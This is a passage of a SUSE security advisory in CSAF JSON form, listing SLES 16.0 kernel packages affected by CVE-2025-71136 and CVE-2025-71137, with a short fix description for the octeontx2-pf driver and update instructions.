"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71136"
},
{
"cve": "CVE-2025-71137",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71137"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocteontx2-pf: fix \"UBSAN: shift-out-of-bounds error\"\n\nThis patch ensures that the RX ring size (rx_pending) is not\nset below the permitted length. This avoids UBSAN\nshift-out-of-bounds errors when users passes small or zero\nring sizes via ethtool -G.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71137",
"url": "https://www.suse.com/security/cve/CVE-2025-71137"
},
{
"category": "external",
"summary": "SUSE Bug 1256760 for CVE-2025-71137",
"url": "https://bugzilla.suse.com/1256760"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
